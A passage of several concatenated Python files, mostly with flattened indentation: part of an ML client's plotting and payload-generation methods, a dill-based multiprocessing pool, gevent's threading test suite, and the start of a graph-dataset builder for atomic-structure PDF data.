matplotlib.pyplot.show(block=block)
@classmethod
def _plot_dataframe_with_class(cls, dataframe: pandas.DataFrame, clss: str, kind: str, x: str, y: str):
available_columns = [x for x in dataframe.columns]
if x not in available_columns:
raise PrescienceClientException(
Exception(f'Given x value \'{x}\' is not present in columns list {str(available_columns)}'))
if y not in available_columns:
raise PrescienceClientException(
Exception(f'Given y value \'{y}\' is not present in columns list {str(available_columns)}'))
available_colors = ['mediumseagreen', 'steelblue', 'tomato', 'DarkOrange', 'darkmagenta', 'darkviolet']
clss_value = dataframe[clss].unique().tolist()
clss_color = {v: available_colors[index % len(available_colors)] for index, v in enumerate(clss_value)}
ax = None
for clss_name in clss_value:
df = dataframe[dataframe[clss] == clss_name]
if ax:
ax = df.plot(x=x, y=y, kind=kind, label=clss_name, color=clss_color[clss_name], ax=ax)
else:
ax = df.plot(x=x, y=y, kind=kind, label=clss_name, color=clss_color[clss_name])
def plot_dataset(self,
dataset_id: str,
plot_train: bool = True,
plot_test: bool = True,
fold_number: int = None,
x: str = None,
y: str = None,
clss: str = None,
block=False):
"""
Plot a wanted dataset data
:param dataset_id: the wanted dataset id
:param plot_train: should plot the 'train' part
:param plot_test: should plot the 'test' part
:param fold_number: Number of the fold to plot (if unset it will plot the whole dataset)
:param block: should block until user close the window
:param x: the name of the column to use as x (for a timeseries forecast it will by default take the time column)
:param y: the name of the column to use as y (for a timeseries forecast it will by default take all the remaining columns)
:param clss: the name of the category column if any (i.e class or label)
"""
dataset = self.dataset(dataset_id=dataset_id)
problem_type = dataset.problem_type()
if plot_train:
if fold_number is None:
df_train = self.dataset_dataframe(dataset_id=dataset_id, test_part=False)
else:
df_train = self.fold_dataframe(dataset_id=dataset_id, fold_number=fold_number, test_part=False)
else:
df_train = None
if plot_test:
if fold_number is None:
df_test = self.dataset_dataframe(dataset_id=dataset_id, test_part=True)
else:
df_test = self.fold_dataframe(dataset_id=dataset_id, fold_number=fold_number, test_part=True)
else:
df_test = None
if problem_type == ProblemType.TIME_SERIES_FORECAST:
time_column = dataset.get_time_column_id()
transformed_timecolumn = dataset.get_feature_target_map().get(time_column)
if transformed_timecolumn is not None and plot_train:
if len(transformed_timecolumn) == 1:
time_column = transformed_timecolumn[-1]
else:
time_column = [x for x in transformed_timecolumn if x.endswith('_ts')][-1]
index_column = time_column
if df_train is not None:
df_train = df_train.set_index(index_column)
df_train = df_train.rename(columns={i: f'{i}_train' for i in list(df_train.columns)})
else:
df_train = pandas.DataFrame({})
if df_test is not None:
df_test = df_test.set_index(index_column)
df_test = df_test.rename(columns={i: f'{i}_test' for i in list(df_test.columns)})
else:
df_test = pandas.DataFrame({})
df_final = pandas.concat([df_train, df_test], axis='columns', sort=True)
df_final.plot()
else:
df_final = pandas.concat([df_train, df_test])
self._plot_dataframe_with_class(dataframe=df_final, clss=clss, kind='scatter', x=x, y=y)
matplotlib.pyplot.show(block=block)
def plot_evaluations(self, dataset_id: str, scoring_metric: ScoringMetric, forecasting_horizon_steps: str = None,
forecasting_discount: str = None):
"""
Plot the evolution of evaluation result scoring metrics for a given dataset
:param dataset_id: The related dataset ID
:param scoring_metric: The scoring metric to display
:param forecasting_horizon_steps: The forecasting_horizon_steps to filter on (if needed)
:param forecasting_discount: The forecasting_discount to filter on (if needed)
:return:
"""
evaluation_results_page = self.get_evaluation_results(
dataset_id=dataset_id,
forecasting_horizon_steps=forecasting_horizon_steps,
forecasting_discount=forecasting_discount
)
metric_serie = [1 - x.costs().get(str(scoring_metric)) for x in evaluation_results_page.content]
df = pandas.DataFrame(index=[x for x in range(len(metric_serie))], data={
str(scoring_metric): metric_serie
})
df.plot()
matplotlib.pyplot.show(block=True)
def generate_serving_payload(self, from_data, model_id: str, output=None) -> str:
"""
Generate a serving payload for a prescience model
:param from_data: integer value indicating the index of the data for classification/regression or the value of the time column for a TS.
In case this value is None, it will trigger the interactive mode to fill in all requested fields
:param model_id: The model ID to generate a payload for
:param output: The output file path in which the json payload will be saved
:return:
"""
model = self.model(model_id)
payload = model.get_model_evaluation_payload(arguments={})
evaluator = payload.get_evaluator()
problem_type = evaluator.get_problem_type()
if from_data is None:
# Fill the payload in full interactive mode
if problem_type == ProblemType.TIME_SERIES_FORECAST:
final_dict = evaluator.interactiv_ts_forecast_payload()
else:
final_dict = evaluator.interactiv_default_payload()
else:
# Try to parse from_data to int
try:
from_data = int(from_data)
except: # pylint: disable=bare-except
pass
# Fill the payload from the data
source_id = model.source_id()
df = self.source_dataframe(source_id=source_id)
if problem_type == ProblemType.TIME_SERIES_FORECAST:
time_feature = evaluator.get_time_feature_name()
max_steps = evaluator.get_max_steps()
filtered = df.set_index(time_feature).truncate(after=from_data).tail(max_steps).reset_index()
final_dict = dataframe_to_dict_series(filtered)
else:
# DataFrame.ix was removed from pandas; .loc is equivalent here on the default RangeIndex
final_dict = df.loc[from_data].to_dict()
label_name = evaluator.get_label()
final_dict.pop(label_name)
# In some case numpy types are not serializable
def default(o):
if isinstance(o, numpy.int64): return int(o)
if isinstance(o, numpy.int32): return int(o)
raise TypeError
default_output = self.get_default_json_ouput()
full_output = Option(output) \
.get_or_else(default_output)
print(f'Saving json into `{full_output}`')
with io.open(full_output, 'w', encoding='utf8') as outfile:
json.dump(final_dict, outfile, indent=4, default=default)
return full_output
def get_roc_curve_dataframe(self, model_id: str) -> pandas.DataFrame:
metric = self.model_metric(model_id)
roc_dict = metric.json_dict['roc']
if roc_dict is None:
raise PrescienceException(Exception(f"Unsupported method for model {model_id}."))
return pandas.DataFrame({'fpr': roc_dict.get('fpr'), 'tpr': roc_dict.get('tpr')})
def plot_roc_curve(self, model_id: str, block: bool = False):
df = self.get_roc_curve_dataframe(model_id=model_id)
df.plot(x='fpr', y='tpr', kind='area')
matplotlib.pyplot.show(block=block)
def get_confusion_matrix(self, model_id: str) -> pandas.DataFrame:
"""
Create the pandas Dataframe of the confusion matrix for a given model
:param model_id: The model ID
:return: A new instance of pandas.Dataframe
"""
metric = self.model_metric(model_id)
confusion_matrix_dict = metric.json_dict['confusion_matrix']
if confusion_matrix_dict is None:
raise PrescienceException(Exception(f"Unsupported method for model {model_id}."))
columns_names = set()
row_names = set()
tab_dict = {}
for column_name, row in confusion_matrix_dict.items():
for row_name, value in row.items():
columns_names.add(column_name)
row_names.add(row_name)
if not tab_dict.get(column_name):
tab_dict[column_name] = {}
tab_dict[column_name][row_name] = value
columns_names = list(columns_names)
columns_names.sort()
row_names = list(row_names)
row_names.sort()
final_dict = {}
for column_name in columns_names:
for row_name in row_names:
if not final_dict.get(column_name):
final_dict[column_name] = []
final_dict[column_name].append(tab_dict[column_name][row_name])
return pandas.DataFrame(data=final_dict, index=row_names)
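# Note (alternative sketch, not used above): pandas can build the same frame directly from
# the dict-of-dicts, outer keys becoming columns and inner keys becoming the index:
#   pandas.DataFrame(confusion_matrix_dict).sort_index().sort_index(axis=1).fillna(0)
# The explicit loops above are kept because they fail loudly on any missing cell.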
def get_metric_scores_dataframe(self, model_id) -> pandas.DataFrame:
"""
Create the pandas Dataframe containing all metrics for a given model
:param model_id: The model ID
:return: A new instance of pandas.Dataframe
"""
metric = self.model_metric(model_id)
scores = metric.json_dict['scores']
columns_names = set()
row_names = set()
tab_dict = {}
for _, row in scores.items():
column_name = row.get('type')
row_name = row.get('label') or 'global'
value = row.get('value')
if column_name and row_name and value:
row_names.add(row_name)
columns_names.add(column_name)
if not tab_dict.get(column_name):
tab_dict[column_name] = {}
tab_dict[column_name][row_name] = value
columns_names = list(columns_names)
columns_names.sort()
row_names = list(row_names)
row_names.sort()
final_dict = {}
for column_name in columns_names:
for row_name in row_names:
if not final_dict.get(column_name):
final_dict[column_name] = []
value_to_append = (tab_dict.get(column_name) or {}).get(row_name) or ''
final_dict[column_name].append(value_to_append)
return pandas.DataFrame(data=final_dict, index=row_names)
def get_default_json_ouput(self):
payload_directory = self \
.config() \
.get_or_create_cache_payload_directory()
full_output = os.path.join(payload_directory, 'payload.json')
return full_output
def generate_payload_dict_for_model(self,
model_id: str,
payload_json: str = None,
from_data=None):
if payload_json is None:
payload_json = self.generate_serving_payload(from_data, model_id)
else:
payload_json = payload_json.strip()
if len(payload_json) > 0 and payload_json[0] == '{' and payload_json[-1] == '}':
# In this case the user gives us a json string
payload_dict = json.loads(payload_json)
elif os.path.isfile(payload_json):
# In this case it is probably a path
with io.open(payload_json, 'r') as stream:
payload_dict = json.load(stream)
else:
payload_dict = json.loads('{}')
return payload_dict
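# --- Usage sketch (illustration only, not part of the client) ---
# Assumes `client` is an already-constructed instance of the client class above and that
# 'my-source', 'my-dataset' and 'my-model' are hypothetical identifiers existing server-side.
#
# df_source = client.source_dataframe(source_id='my-source')  # refreshes the local cache, then reads parquet
# df_train = client.dataset_dataframe(dataset_id='my-dataset', test_part=False)
# df_test = client.dataset_dataframe(dataset_id='my-dataset', test_part=True)  # test part is rebuilt from csv files
# payload_path = client.generate_serving_payload(from_data=0, model_id='my-model')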
|
multiprocesses.py
|
from multiprocessing.managers import BaseManager
from multiprocessing import Process, JoinableQueue
from time import sleep
import os
import signal
import dill
class ProcessPool:
"""
Class which enables multiprocess calls to custom functions
"""
class Shared:
"""
Object shared between processes. Sync'd by the BaseManager
"""
def __init__(self):
self.clear()
def get(self):
return self.data
def add(self, val):
self.data.append(val)
def clear(self):
self.data = []
def __init__(self, processes_count, *args, **kwargs):
self.sleep_length = 2
self.processes_count = processes_count
self.queue_jobs = JoinableQueue()
self.processes = []
BaseManager.register('Shared', self.Shared)
self.manager = BaseManager()
self.manager.start()
self.shared = self.manager.Shared()
for i in range(self.processes_count):
p = Process(target=self.make_pool_call)
p.id = i
p.start()
self.processes.append(p)
def make_pool_call(self):
while True:
item_pickled = self.queue_jobs.get()
if item_pickled is None:
self.queue_jobs.task_done()
break
item = dill.loads(item_pickled)
call = item.get('call')
args = item.get('args')
kwargs = item.get('kwargs')
try:
result = call(*args, **kwargs)
self.shared.add(result)
except Exception as e:
import traceback
traceback.print_exc()
os.kill(os.getpid(), signal.SIGUSR1)
self.queue_jobs.task_done()
def add_job(self, job):
"""
:param: job: has to be a dilled dict:
{
'call': function_to_be_called_by_process,
'args': [],
'kwargs': {},
}
"""
self.queue_jobs.put(job)
def finish_pool_queue(self):
while self.queue_jobs.qsize() > 0:
sleep(self.sleep_length)
for i in range(self.processes_count):
self.queue_jobs.put(None)
self.queue_jobs.join()
self.queue_jobs.close()
for p in self.processes:
p.join()
del self.processes[:]
def get_pool_results(self):
return self.shared.get()
def clear_pool_results(self):
self.shared.clear()
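# --- Usage sketch (illustration only) ---
# Assumes a Unix 'fork' start method (e.g. Linux); `square` is a placeholder job function.
if __name__ == '__main__':
    def square(x):
        return x * x
    pool = ProcessPool(processes_count=4)
    for n in range(10):
        # Jobs are submitted as dill-pickled dicts, matching the format documented in add_job
        pool.add_job(dill.dumps({'call': square, 'args': [n], 'kwargs': {}}))
    pool.finish_pool_queue()
    print(pool.get_pool_results())  # e.g. [0, 1, 4, 9, ...] in completion order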
|
test_threading_2.py
|
# testing gevent's Event, Lock, RLock, Semaphore, BoundedSemaphore with standard test_threading
from __future__ import with_statement
setup_ = '''from gevent import monkey; monkey.patch_all()
from gevent.event import Event
from gevent.lock import RLock, Semaphore, BoundedSemaphore
from gevent.thread import allocate_lock as Lock
import threading
threading.Event = Event
threading.Lock = Lock
threading.RLock = RLock
threading.Semaphore = Semaphore
threading.BoundedSemaphore = BoundedSemaphore
if not hasattr(threading, 'current_thread'):
threading.current_thread = threading.currentThread
if not hasattr(threading.Thread, 'name'):
threading.Thread.name = property(lambda self: self.getName())
if not hasattr(threading.Thread, 'is_alive'):
threading.Thread.is_alive = threading.Thread.isAlive
if not hasattr(threading.Thread, 'daemon'):
threading.Thread.daemon = property(threading.Thread.isDaemon, threading.Thread.setDaemon)
if not hasattr(threading._Condition, 'notify_all'):
threading._Condition.notify_all = threading._Condition.notifyAll
'''
exec setup_
setup_3 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_4 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_5 = '\n'.join(' %s' % line for line in setup_.split('\n'))
import test.test_support
from test.test_support import verbose
import random
import re
import sys
import threading
import thread
import time
import unittest
import weakref
import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>" % i, self, sema, mutex, numrunning)
threads.append(t)
if hasattr(t, 'ident'):
self.failUnlessEqual(t.ident, None)
self.assert_(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.is_alive())
if hasattr(t, 'ident'):
self.failIfEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assert_(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
if sys.version_info[:2] > (2, 5):
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def SKIP_test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
if sys.version_info[:2] > (2, 5):
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
if sys.version_info[:2] > (2, 5):
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
%s
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""" % setup_4])
self.assertEqual(rc, 42)
if sys.version_info[:2] > (2, 5):
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
%s
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
""" % setup_5],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
stdout = stdout.strip()
assert re.match('^Woke up, sleep function is: <.*?sleep.*?>$', stdout), repr(stdout)
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, flags=re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
if sys.version_info[:2] > (2, 5):
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another': self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
%s
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" % setup_3 + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
# skip disable because I think the bug shouldn't apply to gevent -- denis
#if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
# print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
# ' due to known OS bugs on'), sys.platform
# return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(unittest.TestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
def main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
main()
|
graph_maker.py
|
import os, time, multiprocessing, math, random, torch, h5py, glob
from simPDF_xyz import *
from mendeleev import element
import numpy as np
import pandas as pd
import networkx as nx
from tqdm import tqdm
from shutil import copyfile
from diffpy.srreal.overlapcalculator import OverlapCalculator
from diffpy.srreal.pdfcalculator import DebyePDFCalculator
from diffpy.Structure import loadStructure
from norm_space import define_space
from sampleSphere import sampleSphere
import matplotlib.pyplot as plt
from plot_structure import plot_structure
torch.manual_seed(12)
random.seed(12)
np.random.seed(12)
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_DYNAMIC'] = 'FALSE'
def getMinMaxVals(norm, nFiles, maxDist):
print(norm)
df = pd.read_csv(norm)
df = df.sample(frac=1, random_state=42).reset_index(drop=True)
files = []
atomMin = 99
atomMax = 0
minDist = 0
maxDist = maxDist # Largest distance in all structures
for index, row in df.iterrows():
if index == nFiles:
break
namePh = row[row.index[0]]
files.append(namePh[:-4])
if atomMin > row['Atom min']:
atomMin = row['Atom min']
if row['Atom max'] > atomMax:
atomMax = row['Atom max']
#if minDist > row['Edge dist min']:
# minDist = np.amin([row['Edge dist min']])
#if row['Edge dist max'] > maxDist:
# maxDist = np.amax(np.amax([row['Edge dist max']]))
return atomMin, atomMax, minDist, maxDist, files
def transformers(edges,eFeatures,nNodes, normMin, normMax, deadVal):
""" Obtain source and sink node transformer matrices"""
softAdj = torch.sparse.FloatTensor(edges,eFeatures,(nNodes,nNodes))
softAdj = softAdj.to_dense()
for i in range(nNodes):
for j in range(i,nNodes):
if softAdj[i][j] != 0.:
softAdj[i][j] = normFeatures(softAdj[i][j], normMin, normMax)
else:
if i == j and softAdj[0][j] != deadVal:
softAdj[i][j] = 0
elif i == j:
softAdj[i][j] = 0.5*deadVal # Diagonal is added to itself
else:
softAdj[i][j] = deadVal
softAdj += softAdj.T
return softAdj
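# Sketch of the densification step above (illustrative values only): a 3-node graph with
# edges (0,1) and (1,2) carrying raw distances 2.0 and 4.0 becomes a dense 3x3 matrix whose
# listed entries are then min-max normalised and whose missing entries are filled with deadVal:
#   edges = torch.LongTensor([[0, 1], [1, 2]])  # row 0: source nodes, row 1: sink nodes
#   eFeatures = torch.Tensor([2.0, 4.0])
#   torch.sparse.FloatTensor(edges, eFeatures, (3, 3)).to_dense()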
def makeData(data_path, xyzPath, norm, nNodes=100, nFiles=100, loadPDF=False, test_set_ratio=0.2, deadVal=-1, minDist=0, maxDist=100):
"""
Input: Directory with graph .h5 files (and optionally precomputed *_PDF.txt files)
Output: List of graphs with node features and adjacency
"""
start_time = time.time()
#atomMin, atomMax, minDist, maxDist, files = getMinMaxVals(norm, nFiles, maxDist)
if not os.path.isdir(data_path + "/fastload"):
os.mkdir(data_path + "/fastload")
if not os.path.isdir(data_path + "/test_set"):
os.mkdir(data_path + "/test_set")
destination = "/fastload/"
files = sorted(glob.glob(data_path+'*h5*'))
atomMin = 0
atomMax = 95
atomRange = (atomMax - atomMin) + 1
N = len(files)
random.shuffle(files)
print('Found %d graph files' % (N))
graphData = []
pbar = tqdm(total=nFiles)
for iter, f in enumerate(files):
f = f.replace(data_path, "")[:-3]
if not os.path.isfile(data_path + destination[1:] + f + '.h5'):
loadData = h5py.File(data_path + f + '.h5', 'r')
nFeatures = loadData.get('NFM')
eFeatures = loadData.get('EFM')
edgeIndex = loadData.get('EAR')
### Cast to Torch
edgeIndex = torch.LongTensor(np.array(edgeIndex, dtype=int))
eFeatures = torch.Tensor(eFeatures[:, 0])
nFeatures = torch.FloatTensor(nFeatures)
### Obtain the source and sink node pairs
softAdj = transformers(edgeIndex, eFeatures, nNodes, minDist, maxDist, deadVal)
ph = nFeatures.T.clone()
atomLabels = torch.zeros((nNodes, atomRange)) # Index 0 is used for dummy nodes
for j, val in enumerate(ph[0].T):
if val != deadVal: # If not dummy node
atomLabels[j][int(val)] = 1
else: # If dummy node
atomLabels[j][0] = 1
atoms = torch.tensor([normFeatures(val, atomMin, atomMax) if val != deadVal else val for val in ph[0]]).unsqueeze(1)
y_atom = torch.zeros((atomRange, 1))
for i in range(len(ph[0])):
if int(ph[0][i]) != deadVal:
y_atom[int(ph[0][i])] = 1
else:
y_atom[0] = 1
for i in range(ph[1:].size()[0]):
for j in range(ph[1:].size()[1]):
if ph[1:][i][j] == deadVal:
break
else:
ph[1:][i][j] = normFeatures(ph[1:][i][j], minDist, maxDist)
satLabels = ph[1:].T
nFeatures = torch.cat((atoms, satLabels, softAdj), dim=1)
if loadPDF == False:
generator = simPDFs_xyz()
generator.set_parameters_xyz(rmin=0, rmax=30.1, rstep=0.1, Qmin=0.8, Qmax=26, Qdamp=0.03, Biso=0.3, delta2=0)
generator.genPDFs_xyz(xyzPath+'/{}.xyz'.format(f))
r, Gr = generator.getPDF_xyz()
else:
PDF = np.loadtxt(data_path + '/' + f + '_PDF.txt', delimiter=' ')
Gr = PDF[:, 1]
Gr[:10] = torch.zeros((10,))
#Gr += np.abs(np.min(Gr))
Gr /= np.max(Gr)
Gr = torch.tensor(Gr, dtype=(torch.float)).view(1, len(Gr), 1)
if not iter < (1 - test_set_ratio) * len(files):
destination = "/test_set/"
save_graphData = dict(hf_atomLabels=atomLabels, hf_nFeatures=nFeatures, hf_satLabels=satLabels, hf_softAdj=softAdj, hf_y_atom=y_atom, hf_Gr=Gr)
hf_graphData = h5py.File(data_path + destination + f + '.h5', 'w')
for dict_label, dict_Data in save_graphData.items():
hf_graphData.create_dataset(dict_label, data=dict_Data)
hf_graphData.close()
graphData.append((f, atomLabels, nFeatures, satLabels, softAdj, y_atom, Gr))
pbar.update(1)
print("Time used to load data:", (time.time() - start_time) / 60, "min")
pbar.close()
return graphData, atomRange, files
def create_graphs(files, label, saveFolder, satellites, nAtoms, return_dict):
renorm_dict = {}
bc = OverlapCalculator()
bc.atomradiitable = 'covalent'
pbar = tqdm(total=len(files))
for file in files:
if os.path.isfile(saveFolder +'/'+ str(file[0:-4]) + ".h5"):
print (file , "Already Made")
else:
print(file)
cluster, stru_dim = define_space(file, saveFolder, nAtoms, plot=False)
